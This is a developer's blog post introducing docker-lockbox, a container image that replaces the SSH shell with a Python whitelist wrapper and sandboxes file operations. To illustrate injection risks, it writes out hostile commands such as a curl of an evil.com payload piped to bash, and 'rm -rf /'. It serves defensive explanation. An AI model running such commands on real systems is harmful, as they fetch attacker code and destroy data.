docker-lockbox: SSH Into a Container, Get Shit Done, Touch Nothing Else

Every time I build a tool that runs inside a Docker container, I hit the same problem: how do I let people interact with it remotely? The obvious answer is an HTTP API. Spin up Flask or Express, write route handlers, parse request bodies, serialize responses, handle errors, add authentication. For every single tool. Every fucking time.

Then it hit me — SSH already does all of this. Authentication? Public key crypto, battle-tested for decades. Transport? Encrypted by default. Remote command execution? That’s literally what SSH was built for. File transfer? Built in. The only problem is that a normal SSH session gives you a shell, and a shell gives you everything. One rm -rf / and your container is gone. One ; curl evil.com/payload | bash and you’re compromised.

So I built docker-lockbox. A locked-down SSH container where there is no shell. Every command goes through a Python wrapper that validates it against a whitelist before executing. Shell metacharacters like &&, ;, |, $() are just literal strings — they don’t mean anything because no shell ever interprets them. You define exactly which commands are allowed, and everything else gets rejected.

It’s a base image. You FROM psyb0t/lockbox, install your binaries, drop in a JSON file listing which commands are allowed, and you’ve got a secure, remotely accessible tool container. No HTTP framework, no REST endpoints, no request parsing. Just ssh myapp@host "tool --flag arg".

The Problem With HTTP APIs For Everything

I’ve been wrapping CLI tools in HTTP APIs for years. It’s always the same pattern:

  • Write a web server that accepts POST requests
  • Parse the JSON body into command arguments
  • Spawn a subprocess, capture stdout/stderr
  • Serialize the output back to JSON
  • Handle file uploads via multipart forms
  • Handle file downloads via streaming responses
  • Add authentication because the endpoint is exposed
  • Add rate limiting because the internet is hostile
  • Add CORS headers because browsers exist

That’s like 200 lines of boilerplate before you’ve done anything useful. And then you do it again for the next tool. And the next one. The actual business logic is one line — ffmpeg -i input.mp4 output.wav — but the wrapper around it is a whole project.

SSH gives you all of this for free. Key-based auth that’s stronger than any API token. Encrypted transport without thinking about TLS certificates. File transfer with scp or pipe redirection. Command execution that’s just… command execution. The only thing missing is the lockdown — making sure the person on the other end can only run what you want them to run.

How The Lockdown Works

When someone SSHs into a lockbox container, they don’t get a shell. The SSH server’s ForceCommand directive routes every connection through a Python wrapper called lockbox-wrapper. This wrapper:

  1. Reads the command from SSH_ORIGINAL_COMMAND
  2. Parses it with shlex.split() — Python’s shell-safe tokenizer
  3. Checks the command name against the allowed list
  4. If it’s a built-in file operation, handles it directly in Python
  5. If it’s an allowed external command, calls os.execv() with the binary path and arguments
  6. If it’s anything else, rejects it

The critical detail: os.execv(), not subprocess.Popen(shell=True). The binary is executed directly with its arguments as a list. No shell is involved at any point in the chain — not in SSH, not in the wrapper, not in execution. When someone sends ssh myapp@host "ffmpeg -i input.mp4; rm -rf /", the wrapper sees one command named ffmpeg with arguments ["-i", "input.mp4;", "rm", "-rf", "/"]. The semicolon is just a character in an argument string. ffmpeg will complain about a weird filename and that’s it.

Built-in File Operations

Every lockbox container ships with a full set of file operations that work inside the /work directory. You don’t configure these — they’re always available:

# Upload a file
ssh lockbox@host "put input.txt" < input.txt # Download a file ssh lockbox@host "get output.txt" > output.txt
# List files (plain or JSON)
ssh lockbox@host "list-files"
ssh lockbox@host "list-files --json"
# File metadata
ssh lockbox@host "file-info output.txt"
ssh lockbox@host "file-hash output.txt"
ssh lockbox@host "file-exists output.txt"
# Move, copy, delete
ssh lockbox@host "move-file old.txt new.txt"
ssh lockbox@host "copy-file original.txt backup.txt"
ssh lockbox@host "remove-file input.txt"
# Directory operations
ssh lockbox@host "create-dir project1"
ssh lockbox@host "remove-dir project1"
ssh lockbox@host "remove-dir-recursive project1"
# Search and disk usage
ssh lockbox@host "search-files **/*.txt"
ssh lockbox@host "disk-usage"
# Append to existing file
echo "more data" | ssh lockbox@host "append-file output.txt"

All paths are sandboxed to /work. The wrapper resolves every path through os.path.realpath() and checks that the result starts with /work/. Absolute paths get remapped under /work. Traversal attempts with ../../ get resolved and blocked. You physically cannot touch anything outside that directory.

Building Your Own Tool Container

The whole point of lockbox is to be a base image. You install your tools, tell lockbox which commands to allow, and you’re done. Here’s a complete example — an ffmpeg processing container:

# allowed.json
{
  "ffmpeg": "/usr/bin/ffmpeg",
  "ffprobe": "/usr/bin/ffprobe"
}
# Dockerfile
FROM psyb0t/lockbox
ENV LOCKBOX_USER=mediaproc
RUN apt-get update && \
    apt-get install -y --no-install-recommends ffmpeg && \
    apt-get clean && rm -rf /var/lib/apt/lists/*
COPY allowed.json /etc/lockbox/allowed.json

That’s the entire Dockerfile. Build it, run it with your SSH key mounted, and now you can remotely process media:

# Upload a video
ssh -p 2222 mediaproc@host "put input.mp4" < video.mp4 # Convert to audio ssh -p 2222 mediaproc@host "ffmpeg -i /work/input.mp4 -vn -acodec pcm_s16le /work/output.wav" # Download the result ssh -p 2222 mediaproc@host "get output.wav" > output.wav

The user can run ffmpeg and ffprobe with any arguments they want. They can upload and download files. They cannot do anything else. No shell, no package installation, no network probing, no container escape. The attack surface is exactly two binaries plus the file operations.

The Entrypoint

The entrypoint handles all the shit that makes containers annoying to run as non-root:

UID/GID matching. Pass LOCKBOX_UID and LOCKBOX_GID to match the host user. Files created in /work have correct ownership on the host. No permission fuckery.

Custom SSH username. Set LOCKBOX_USER=myapp in your Dockerfile and users connect with ssh myapp@host instead of ssh lockbox@host. The entrypoint renames the system user and updates sshd config at startup.

Persistent host keys. Mount a volume to /etc/lockbox/host_keys and SSH host keys survive container recreates. No more “REMOTE HOST IDENTIFICATION HAS CHANGED” warnings every time you rebuild.

Entrypoint extensions. Drop executable .sh scripts in /etc/lockbox/entrypoint.d/ and they run before sshd starts. Need to rebuild a font cache? Warm up a model? Initialize a database? Just add a script.

Tailscale and The Zero-Config Dream

Here’s where lockbox really shines. Put your lockbox container on a machine running Tailscale and you’ve got secure remote access to any CLI tool without exposing a single port to the internet. No VPN setup, no firewall rules, no reverse proxy, no TLS certificates, no dynamic DNS bullshit.

Your home server running ffmpeg via lockbox? ssh -p 2222 mediaproc@my-server "ffmpeg -i /work/input.mp4 /work/output.wav" from anywhere in the world. Your GPU rig doing ML inference? Same thing. Your Raspberry Pi running some weird sensor processing? Same fucking thing. Tailscale handles the networking, SSH handles the authentication and encryption, lockbox handles the sandboxing. Three layers of security with zero configuration beyond what you’ve already done.

The same applies to Cloudflare Tunnel if that’s your thing. Route SSH through the tunnel, lockbox validates commands on the other end. No ports exposed, no attack surface beyond what you explicitly allow.

This is the real power move — any CLI tool on any machine becomes a secure, remotely accessible service. No API server, no port forwarding, no nginx, no certbot. Just SSH through your mesh network and run commands.

The Installer Generator

This is where lockbox gets seriously useful for distributing tools. The repo includes create_installer.sh — a script that takes a YAML config and generates a complete install.sh for your downstream project. Users run curl | sudo bash and get a fully configured setup with docker-compose, SSH keys, a CLI wrapper, and lifecycle management.

Example config:

name: myapp
image: psyb0t/myapp
repo: psyb0t/docker-myapp
volumes:
  - flag: -d
    env: DATA_DIR
    mount: /data:ro
    default: ./data
    description: Data directory
environment:
  - flag: -w
    env: WORKERS
    container_env: APP_WORKERS
    default: 4
    description: Number of workers

Run it through the generator and you get an install.sh that creates ~/.myapp/ with docker-compose files, authorized_keys, host_keys, work dir, a .env with all configurable values, and a CLI wrapper at /usr/local/bin/myapp with commands for the full lifecycle:

myapp start -d                                   # start detached
myapp start -d --processing-unit cuda --gpus 0   # NVIDIA GPU 0
myapp start -d --processing-unit rocm --gpus all  # all AMD GPUs
myapp start -d -w 8 --cpus 4 --memory 8g         # resource limits
myapp stop                                        # stop
myapp status                                      # container status
myapp logs -f                                     # follow logs
myapp upgrade                                     # pull latest and reinstall
myapp uninstall                                   # nuke everything

Every generated installer includes GPU support out of the box. Three compose files get generated — base, CUDA overlay, and ROCm overlay. The CLI wrapper merges the right one based on --processing-unit. NVIDIA and AMD GPUs just work with the right flag. CPU mode is the default — no overlays, no GPU passthrough, just run the tool.

Already Built on Lockbox

I’m already using lockbox as the base for other projects:

  • docker-mediaproc — FFmpeg, Sox, ImageMagick, and 2200+ fonts for media processing over SSH
  • docker-qwenspeak — Qwen3-TTS text-to-speech over SSH with preset voices, voice cloning, and voice design

Same pattern each time: install the tool, write the allowed.json, build, ship. No HTTP server, no API framework, no serialization bullshit. The tool’s CLI is the API.

The Bottom Line

Stop wrapping every CLI tool in an HTTP API. SSH already handles authentication, encryption, file transfer, and remote execution. All that’s missing is the lockdown, and that’s what lockbox does — a Python wrapper that validates every command against a whitelist, sandboxes file operations to /work, and never touches a shell.

One base image. One JSON config. Any CLI tool becomes a secure remote service.

Go grab it: github.com/psyb0t/docker-lockbox

Licensed under WTFPL — because locking down SSH access shouldn’t require a locked-down license.